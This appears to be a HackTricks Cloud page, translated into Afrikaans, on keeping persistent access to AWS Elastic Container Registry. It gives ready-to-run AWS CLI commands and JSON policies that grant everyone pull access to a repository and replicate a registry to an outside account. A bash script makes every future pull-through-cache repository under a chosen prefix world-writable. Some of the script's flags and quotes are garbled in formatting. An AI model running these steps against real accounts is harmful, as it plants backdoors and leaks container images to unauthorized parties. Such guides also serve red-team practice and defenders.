AWS - ECR Persistence

Tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

ECR

Vir meer inligting, sien:

AWS - ECR Enum

Hidden Docker Image with Malicious Code

’n aanvaller kan upload a Docker image containing malicious code na ’n ECR repository oplaai en dit gebruik om persistence in die geteikende AWS-rekening te handhaaf. Die aanvaller kan dan die malicious image op verskeie dienste binne die rekening, soos Amazon ECS of EKS, stilweg uitrol.

Repository Policy

Voeg ’n beleid by op ’n enkele repository wat jou (of almal) toegang tot daardie repository gee:

aws ecr set-repository-policy \
--repository-name cluster-autoscaler \
--policy-text file:///tmp/my-policy.json

# With a .json such as

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

Warning

Neem kennis dat ECR vereis dat gebruikers toestemming het om oproepe te maak na die ecr:GetAuthorizationToken API deur ’n IAM-beleid voordat hulle kan autentiseer by ’n registry en enige images na of van enige Amazon ECR repository kan push of pull.

Registerbeleid & Kruis-rekening replikasie

Dit is moontlik om ’n registry outomaties in ’n eksterne rekening te repliseer deur kruis-rekening replikasie te konfigureer, waar jy die eksterne rekening moet aandui waarin jy die registry wil repliseer.

Eers moet jy die eksterne rekening toegang gee tot die registry met ’n registry policy soos:

aws ecr put-registry-policy --policy-text file://my-policy.json

# With a .json like:

{
"Sid": "asdasd",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::947247140022:root"
},
"Action": [
"ecr:CreateRepository",
"ecr:ReplicateImage"
],
"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}

Pas dan die repliseringskonfigurasie toe:

aws ecr put-replication-configuration \
--replication-configuration file://replication-settings.json \
--region us-west-2

# Having the .json a content such as:
{
"rules": [{
"destinations": [{
"region": "destination_region",
"registryId": "destination_accountId"
}],
"repositoryFilters": [{
"filter": "repository_prefix_name",
"filterType": "PREFIX_MATCH"
}]
}]
}

Repository Creation Templates (prefix backdoor for future repos)

Misbruik ECR Repository Creation Templates om outomaties enige repository te backdoor wat ECR onder ’n beheerde prefix self skep (byvoorbeeld via Pull-Through Cache of Create-on-Push). Dit verleen volhoubare ongemagtigde toegang tot toekomstige repos sonder om bestaande te raak.

  • Benodigde perms: ecr:CreateRepositoryCreationTemplate, ecr:DescribeRepositoryCreationTemplates, ecr:UpdateRepositoryCreationTemplate, ecr:DeleteRepositoryCreationTemplate, ecr:SetRepositoryPolicy (used by the template), iam:PassRole (if a custom role is attached to the template).
  • Impak: Enige nuwe repository wat onder die geteikende prefix geskep word, erf outomaties ’n attacker-controlled repository policy (bv. cross-account read/write), tag mutability, en scanning defaults.
Backdoor future PTC-created repos under a chosen prefix ```bash # Region REGION=us-east-1

1) Prepare permissive repository policy (example grants everyone RW)

cat > /tmp/repo_backdoor_policy.json <<‘JSON’ { “Version”: “2012-10-17”, “Statement”: [ { “Sid”: “BackdoorRW”, “Effect”: “Allow”, “Principal”: {“AWS”: “*”}, “Action”: [ “ecr:BatchCheckLayerAvailability”, “ecr:BatchGetImage”, “ecr:GetDownloadUrlForLayer”, “ecr:InitiateLayerUpload”, “ecr:UploadLayerPart”, “ecr:CompleteLayerUpload”, “ecr:PutImage” ] } ] } JSON

2) Create a Repository Creation Template for prefix “ptc2” applied to PULL_THROUGH_CACHE

aws ecr create-repository-creation-template –region $REGION –prefix ptc2 –applied-for PULL_THROUGH_CACHE –image-tag-mutability MUTABLE –repository-policy file:///tmp/repo_backdoor_policy.json

3) Create a Pull-Through Cache rule that will auto-create repos under that prefix

This example caches from Amazon ECR Public namespace “nginx”

aws ecr create-pull-through-cache-rule –region $REGION –ecr-repository-prefix ptc2 –upstream-registry ecr-public –upstream-registry-url public.ecr.aws –upstream-repository-prefix nginx

4) Trigger auto-creation by pulling a new path once (creates repo ptc2/nginx)

acct=$(aws sts get-caller-identity –query Account –output text) aws ecr get-login-password –region $REGION | docker login –username AWS –password-stdin ${acct}.dkr.ecr.${REGION}.amazonaws.com

docker pull ${acct}.dkr.ecr.${REGION}.amazonaws.com/ptc2/nginx:latest

5) Validate the backdoor policy was applied on the newly created repository

aws ecr get-repository-policy –region $REGION –repository-name ptc2/nginx –query policyText –output text | jq .

</details>

> [!TIP]
> Leer & oefen AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Leer & oefen GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Leer & oefen Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Ondersteun HackTricks</summary>
>
> - Kyk na die [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Sluit aan by die** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) of die [**telegram group**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Deel hacking tricks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>